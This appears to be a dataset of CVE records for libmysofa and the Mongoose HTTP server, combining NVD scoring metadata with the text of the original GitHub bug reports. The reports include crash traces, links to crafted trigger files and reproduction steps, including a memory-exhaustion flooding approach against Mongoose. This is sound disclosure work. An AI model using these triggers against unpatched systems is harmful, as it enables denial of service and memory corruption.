] | 476 | https://github.com/hoene/libmysofa/issues/138 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"hoene",
"libmysofa"
] | Opening maliciously crafted file with mysofa_open leads to crash of the application.
NULL pointer dereference in verifyAttribute (tools.c:26) on variable attr->value causes segmentation fault.
Message from gdb:
> Program received signal SIGSEGV, Segmentation fault.
> __strcmp_sse2_unaligned () at ../sysdeps/x86_64/multiarch/strcmp-sse2-unaligned.S:32
AddressSanitizer report on crash:
ASAN:SIGSEGV
==13017==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f777bf6b05e bp 0x7fff17798270 sp 0x7fff17797a00 T0)
#0 0x7f777bf6b05d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x4705d)
#1 0x426747 in verifyAttribute libmysofa-master/src/hrtf/tools.c:26
#2 0x435b37 in mysofa_loudness libmysofa-master/src/hrtf/loudness.c:24
#3 0x406e97 in mysofa_open_default libmysofa-master/src/hrtf/easy.c:56
#4 0x406e97 in mysofa_open libmysofa-master/src/hrtf/easy.c:86
#5 0x4022d4 in main libmysofa-master/test_libmysofa.c:116
#6 0x7f777b65782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#7 0x402b48 in _start (libmysofa-master/test_libmysofa_asan.exe+0x402b48)
File triggering crash (unzip before test):
[crash_004_verifyAttribute.zip](https://github.com/hoene/libmysofa/files/5131014/crash_004_verifyAttribute.zip)
Code snippet for reproduction:
> int filter_length;
> int err;
> struct MYSOFA_EASY *easy = NULL;
> easy = mysofa_open(filename, 48000, &filter_length, &err);
> printf("Result: %p err: %d\n", easy, err);
> mysofa_close(easy);
Affected versions:
- master (2020-08-26)
- 1.1
(earlier versions have not been tested yet) | NULL pointer dereference in verifyAttribute | https://api.github.com/repos/hoene/libmysofa/issues/138/comments | 2 | 2020-08-26T16:00:48Z | 2021-02-09T08:57:15Z | https://github.com/hoene/libmysofa/issues/138 | 686,437,740 | 138 | 1,688 |
CVE-2020-36149 | 2021-02-08T21:15:13.133 | Incorrect handling of input data in changeAttribute function in the libmysofa library 0.5 - 1.1 will lead to NULL pointer dereference and segmentation fault error in case of restrictive memory protection or near NULL pointer overwrite in case of no memory restrictions (e.g. in embedded environments). | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/137"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/137"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:symonics:libmysofa:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1A54F39D-2695-46A2-98DF-7FCDF56A3EC2",
"versionEndExcluding": null,
"versionEndIncluding": "1.1",
"versionStartExcluding": null,
"versionStartIncluding": "0.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/hoene/libmysofa/issues/137 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"hoene",
"libmysofa"
] | Opening maliciously crafted file with mysofa_open leads to crash of the application.
NULL pointer dereference in changeAttribute (tools.c:37) on variable attr->value causes segmentation fault.
Message from gdb:
> Program received signal SIGSEGV, Segmentation fault.
> __strcmp_sse2_unaligned () at ../sysdeps/x86_64/multiarch/strcmp-sse2-unaligned.S:32
AddressSanitizer report on crash:
ASAN:SIGSEGV
==12754==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fec7bf0105e bp 0x7ffee7ed2090 sp 0x7ffee7ed1820 T0)
#0 0x7fec7bf0105d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x4705d)
#1 0x4269d6 in changeAttribute libmysofa-master/src/hrtf/tools.c:37
#2 0x424dc9 in convertArray2 libmysofa-master/src/hrtf/spherical.c:27
#3 0x424dc9 in mysofa_tocartesian libmysofa-master/src/hrtf/spherical.c:38
#4 0x406ea7 in mysofa_open_default libmysofa-master/src/hrtf/easy.c:63
#5 0x406ea7 in mysofa_open libmysofa-master/src/hrtf/easy.c:86
#6 0x4022d4 in main libmysofa-master/test_libmysofa.c:116
#7 0x7fec7b5ed82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#8 0x402b48 in _start (libmysofa-master/test_libmysofa_asan.exe+0x402b48)
File triggering crash (unzip before test):
[crash_002_changeAttribute.zip](https://github.com/hoene/libmysofa/files/5130996/crash_002_changeAttribute.zip)
Code snippet for reproduction:
> int filter_length;
> int err;
> struct MYSOFA_EASY *easy = NULL;
> easy = mysofa_open(filename, 48000, &filter_length, &err);
> printf("Result: %p err: %d\n", easy, err);
> mysofa_close(easy);
Affected versions:
- master (2020-08-26)
- 1.1
(earlier versions have not been tested yet) | NULL pointer dereference in changeAttribute | https://api.github.com/repos/hoene/libmysofa/issues/137/comments | 2 | 2020-08-26T15:56:07Z | 2021-02-09T08:57:17Z | https://github.com/hoene/libmysofa/issues/137 | 686,434,379 | 137 | 1,689 |
CVE-2020-36150 | 2021-02-08T21:15:13.180 | Incorrect handling of input data in loudness function in the libmysofa library 0.5 - 1.1 will lead to heap buffer overflow and access to unallocated memory block. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/135"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/135"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:symonics:libmysofa:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1A54F39D-2695-46A2-98DF-7FCDF56A3EC2",
"versionEndExcluding": null,
"versionEndIncluding": "1.1",
"versionStartExcluding": null,
"versionStartIncluding": "0.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/hoene/libmysofa/issues/135 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"hoene",
"libmysofa"
] | Opening maliciously crafted file with mysofa_open leads to crash of the application.
Heap buffer overread by 126976 bytes in loudness() (libmysofa/src/hrtf/tools.c:179) cause segmentation fault.
Message from gdb:
> Program received signal SIGSEGV, Segmentation fault.
> 0x000000000040fcdc in loudness (in=0x652000, size=240) at libmysofa-master/src/hrtf/tools.c:180
> 180 res += *in * *in;
>
AddressSanitizer report on crash:
> ASAN:SIGSEGV
> ==5041==ERROR: AddressSanitizer: SEGV on unknown address 0x60200002d150 (pc 0x00000043180f bp 0x000000000ea6 sp 0x7fffe30a47f8 T0)
> #0 0x43180e in loudness libmysofa-master/src/hrtf/tools.c:179
> #1 0x43b6a2 in mysofa_loudness libmysofa-master/src/hrtf/loudness.c:49
> #2 0x406e97 in mysofa_open_default libmysofa-master/src/hrtf/easy.c:56
> #3 0x406e97 in mysofa_open libmysofa-master/src/hrtf/easy.c:86
> #4 0x4022d4 in main libmysofa-master/test_libmysofa.c:116
> #5 0x7f86208b682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
> #6 0x402b48 in _start (libmysofa-master/test_libmysofa_asan.exe+0x402b48)
File triggering crash (unzip before test):
[crash_000_loudness.zip](https://github.com/hoene/libmysofa/files/5129954/crash_000_loudness.zip)
Code snippet for reproduction:
> int filter_length;
> int err;
> struct MYSOFA_EASY *easy = NULL;
> easy = mysofa_open(filename, 48000, &filter_length, &err);
> printf("Result: %p err: %d\n", easy, err);
> mysofa_close(easy);
Affected versions:
- master (2020-08-26)
- 1.1
(earlier versions have not been tested yet) | Heap buffer overflow in loudness | https://api.github.com/repos/hoene/libmysofa/issues/135/comments | 2 | 2020-08-26T13:10:12Z | 2021-02-09T08:57:19Z | https://github.com/hoene/libmysofa/issues/135 | 686,307,539 | 135 | 1,690 |
CVE-2020-36151 | 2021-02-08T21:15:13.257 | Incorrect handling of input data in mysofa_resampler_reset_mem function in the libmysofa library 0.5 - 1.1 will lead to heap buffer overflow and overwriting large memory block. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/134"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/134"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:symonics:libmysofa:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1A54F39D-2695-46A2-98DF-7FCDF56A3EC2",
"versionEndExcluding": null,
"versionEndIncluding": "1.1",
"versionStartExcluding": null,
"versionStartIncluding": "0.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/hoene/libmysofa/issues/134 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"hoene",
"libmysofa"
] | Opening maliciously crafted file with mysofa_open leads to crash of the application.
Heap buffer overflow is caused by zeroing memory block of size (-1 casted to unsigned) in mysofa_resampler_reset_mem (speex_resampler.c:798).
AddressSanitizer report on crash:
==4759==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61600000fbfc at pc 0x7f396b3d3bec bp 0x7fff70a7c110 sp 0x7fff70a7b8b8
WRITE of size 17179869180 at 0x61600000fbfc thread T0
#0 0x7f396b3d3beb in __asan_memset (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8cbeb)
#1 0x4451fa in mysofa_resampler_reset_mem libmysofa-master/src/resampler/speex_resampler.c:791
#2 0x439f7c in mysofa_resample libmysofa-master/src/hrtf/resample.c:55
#3 0x406e39 in mysofa_open_default libmysofa-master/src/hrtf/easy.c:49
#4 0x406e39 in mysofa_open libmysofa-master/src/hrtf/easy.c:86
#5 0x4022d4 in main libmysofa-master/test_libmysofa.c:116
#6 0x7f396aa7a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#7 0x402b48 in _start (libmysofa-master/test_libmysofa_asan.exe+0x402b48)
File triggering crash (unzip before test):
[crash_008_mysofa_resampler_reset_mem.zip](https://github.com/hoene/libmysofa/files/5125668/crash_008_mysofa_resampler_reset_mem.zip)
Code snippet for reproduction:
> int filter_length;
> int err;
> struct MYSOFA_EASY *easy = NULL;
> easy = mysofa_open(filename, 48000, &filter_length, &err);
> printf("Result: %p err: %d\n", easy, err);
> mysofa_close(easy);
Affected versions:
- master (2020-08-26)
- 1.1
(earlier versions were not tested so far) | Heap buffer overflow in mysofa_resampler_reset_mem | https://api.github.com/repos/hoene/libmysofa/issues/134/comments | 3 | 2020-08-25T18:42:17Z | 2021-02-09T08:57:21Z | https://github.com/hoene/libmysofa/issues/134 | 685,705,800 | 134 | 1,691 |
CVE-2020-36152 | 2021-02-08T21:15:13.320 | Buffer overflow in readDataVar in hdf/dataobject.c in Symonics libmysofa 0.5 - 1.1 allows attackers to execute arbitrary code via a crafted SOFA. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/136"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/hoene/libmysofa/issues/136"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RQLNZOVVONQSZZJHQVZT6NMOUUDMGBBR/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:symonics:libmysofa:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1A54F39D-2695-46A2-98DF-7FCDF56A3EC2",
"versionEndExcluding": null,
"versionEndIncluding": "1.1",
"versionStartExcluding": null,
"versionStartIncluding": "0.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/hoene/libmysofa/issues/136 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"hoene",
"libmysofa"
] | Incorrect use of sprintf on a too small buffer leads to a stack buffer overflow by 4 bytes in dataobject.c:806.
This can lead to overwriting the next variable on the stack and logic errors in the application or crash in case of strong stack protection.
GDB stacktrace:
#10 0x00000000004123ce in sprintf (__fmt=0x442844 "REF%08lX", __s=0x7fffffffcab0 "REF170000000000") at /usr/include/x86_64-linux-gnu/bits/stdio2.h:33
#11 readDataVar (reader=reader@entry=0x7fffffffd140, data=data@entry=0x7fffffffcb80, dt=dt@entry=0x7fffffffcb94, ds=ds@entry=0x7fffffffcbb0)
at libmysofa-master/src/hdf/dataobject.c:806
#12 0x0000000000412c4b in readDataDim (reader=0x7fffffffd140, da=0x7fffffffcb80, dt=0x7fffffffcb94, ds=0x7fffffffcbb0, dim=dim@entry=0)
at libmysofa-master/src/hdf/dataobject.c:843
#13 0x0000000000412dc4 in readData (reader=reader@entry=0x7fffffffd140, da=da@entry=0x7fffffffcb80, dt=dt@entry=0x7fffffffcb94, ds=ds@entry=0x7fffffffcbb0)
at libmysofa-master/src/hdf/dataobject.c:856
#14 0x0000000000413aa7 in readOHDRHeaderMessageAttribute (reader=reader@entry=0x7fffffffd140, dataobject=0x61700000f588)
at libmysofa-master/src/hdf/dataobject.c:999
#15 0x0000000000414517 in readOHDRmessages (reader=reader@entry=0x7fffffffd140, dataobject=dataobject@entry=0x61700000f588, end_of_messages=end_of_messages@entry=13017)
at libmysofa-master/src/hdf/dataobject.c:1120
#16 0x00000000004176e5 in readOCHK (end=13021, dataobject=<optimized out>, reader=0x7fffffffd140) at libmysofa-master/src/hdf/dataobject.c:1162
#17 readOHDRHeaderMessageContinue (dataobject=<optimized out>, reader=0x7fffffffd140) at libmysofa-master/src/hdf/dataobject.c:890
#18 readOHDRmessages (reader=reader@entry=0x7fffffffd140, dataobject=dataobject@entry=0x61700000f588, end_of_messages=6851)
at libmysofa-master/src/hdf/dataobject.c:1124
#19 0x00000000004183e7 in dataobjectRead (reader=reader@entry=0x7fffffffd140, dataobject=dataobject@entry=0x61700000f588, name=name@entry=0x60200000ebd0 "ListenerView")
at libmysofa-master/src/hdf/dataobject.c:1211
#20 0x000000000041d000 in directblockRead (reader=reader@entry=0x7fffffffd140, fractalheap=fractalheap@entry=0x7fffffffd290, dataobject=0x7fffffffd178, dataobject=0x7fffffffd178)
at libmysofa-master/src/hdf/fractalhead.c:238
#21 0x00000000004205c9 in fractalheapRead (reader=reader@entry=0x7fffffffd140, dataobject=dataobject@entry=0x7fffffffd178, fractalheap=fractalheap@entry=0x7fffffffd290)
at libmysofa-master/src/hdf/fractalhead.c:638
#22 0x00000000004187ef in dataobjectRead (reader=reader@entry=0x7fffffffd140, dataobject=dataobject@entry=0x7fffffffd178, name=name@entry=0x0)
at libmysofa-master/src/hdf/dataobject.c:1236
#23 0x000000000040ebde in superblockRead2or3 (reader=reader@entry=0x7fffffffd140, superblock=superblock@entry=0x7fffffffd150)
at libmysofa-master/src/hdf/superblock.c:64
#24 0x000000000040f6ab in superblockRead (reader=reader@entry=0x7fffffffd140, superblock=superblock@entry=0x7fffffffd150)
at libmysofa-master/src/hdf/superblock.c:170
#25 0x000000000040bb6c in mysofa_load (filename=filename@entry=0x7fffffffdb17 "crash_003_readDataVar_555.hdf", err=err@entry=0x7fffffffd540)
at libmysofa-master/src/hrtf/reader.c:305
#26 0x0000000000406d89 in mysofa_open_default (neighbor_radius_step=0.00999999978, neighbor_angle_step=0.5, applyNorm=true, err=0x7fffffffd540, filterlength=0x7fffffffd500,
samplerate=<optimized out>, filename=0x7fffffffdb17 "crash_003_readDataVar.hdf")
at libmysofa-master/src/hrtf/easy.c:37
#27 mysofa_open (filename=0x7fffffffdb17 "crash_003_readDataVar.hdf", samplerate=samplerate@entry=48000,
filterlength=filterlength@entry=0x7fffffffd500, err=err@entry=0x7fffffffd540) at libmysofa-master/src/hrtf/easy.c:86
#28 0x00000000004022d5 in main (argc=2, argv=0x7fffffffd698) at test_libmysofa.c:116
File triggering crash with ASAN (unzip before test):
[crash_003_readDataVar.zip](https://github.com/hoene/libmysofa/files/5130812/crash_003_readDataVar.zip)
Code snippet for reproduction:
> int filter_length;
> int err;
> struct MYSOFA_EASY *easy = NULL;
> easy = mysofa_open(filename, 48000, &filter_length, &err);
> printf("Result: %p err: %d\n", easy, err);
> mysofa_close(easy);
Solution:
Make the number buffer larger, use snprintf with the size of the number buffer and check the value returned by snprintf! | Stack buffer overflow in readDataVar | https://api.github.com/repos/hoene/libmysofa/issues/136/comments | 2 | 2020-08-26T15:33:36Z | 2021-02-09T08:57:24Z | https://github.com/hoene/libmysofa/issues/136 | 686,418,384 | 136 | 1,692 |
CVE-2021-26528 | 2021-02-08T21:15:13.680 | The mg_http_serve_file function in Cesanta Mongoose HTTP server 7.0 is vulnerable to remote OOB write attack via connection request after exhausting memory pool. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mongoose/issues/1201"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/cesanta/mongoose/issues/1201"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cesanta:mongoose:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "60B6E6E9-893D-4993-B8E4-906343FF7837",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/cesanta/mongoose/issues/1201 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"cesanta",
"mongoose"
] | Mongoose HTTP server is vulnerable to remote OOB write attack via connection request after exhausting memory pool.
Incorrect handling of the value returned by calloc may lead to:
- NULL pointer dereference and segmentation fault error in case of restrictive memory protection,
- near NULL pointer overwrite in case of limited memory restrictions (e.g. in embedded environments).
Memory allocations are triggered during handling of each HTTP requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory.
In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely.
Vulnerable code (mongoose.c):
427: struct http_data {
428: void *old_pfn_data; // Previous pfn_data
429: FILE *fp; // For static file serving
430: };
780: void mg_http_serve_file(struct mg_connection *c, struct mg_http_message *hm,
781: const char *path, const char *mime, const char *hdrs) {
800: struct http_data *d = (struct http_data *) calloc(1, sizeof(*d));
801: d->fp = fp;
802: d->old_pfn_data = c->pfn_data;
803: c->pfn = static_cb;
804: c->pfn_data = d;
See following recommendations for details (especially the calloc example):
https://wiki.sei.cmu.edu/confluence/display/c/ERR33-C.+Detect+and+handle+standard+library+errors
The issue can be reproduced and tested using ErrorSanitizer (https://gitlab.com/ErrorSanitizer/ErrorSanitizer).
Reproduction steps:
0. Install gdb
1. Download and unpack code of ErrorSanitizer (https://gitlab.com/ErrorSanitizer/ErrorSanitizer)
2. Remove hook files from from the ErrorSanitizer/hooks directory APART from hooks_memory.c file:
find ErrorSanitizer/hooks -name "hooks_[acfost]*[.]c" -delete
3. Comment out the whole contents of hooks/hooks_memory.c file APART from the calloc section to disable hooks for: malloc and realloc.
/**************************************************************************************/
/* void* calloc(size_t num, size_t size); */
typedef void *(*calloc_func_t)(size_t num, size_t size);
static void *real_calloc(size_t num, size_t size)
...
void *calloc(size_t num, size_t size)
...
/**************************************************************************************/
4. Continue with compilation of ErrorSanitizer according to the manual (https://gitlab.com/ErrorSanitizer/ErrorSanitizer#compilation)
cd ErrorSanitizer; make
5. Set ESAN to the path of ErrorSanitizer directory
export ESAN=/opt/...
6. Download and unzip attached map temp_3.cur_input
[temp_3.cur_input.zip](https://github.com/cesanta/mongoose/files/5860643/temp_3.cur_input.zip)
7. Download, unzip and compile mongoose example "complete" with debug symbols (-g)
8. Run Mongoose "complete" example with ErrorSanitizer in gdb using:
gdb -batch -ex='run' -ex='backtrace' --args env LD_PRELOAD="$ESAN/error_sanitizer_preload.so" ./example temp_3.cur_input
9. Open in the browser following URL (where <MONGOOSE_IP> is address of tested Mongoose instance):
http://<MONGOOSE_IP>:8000/#/logs
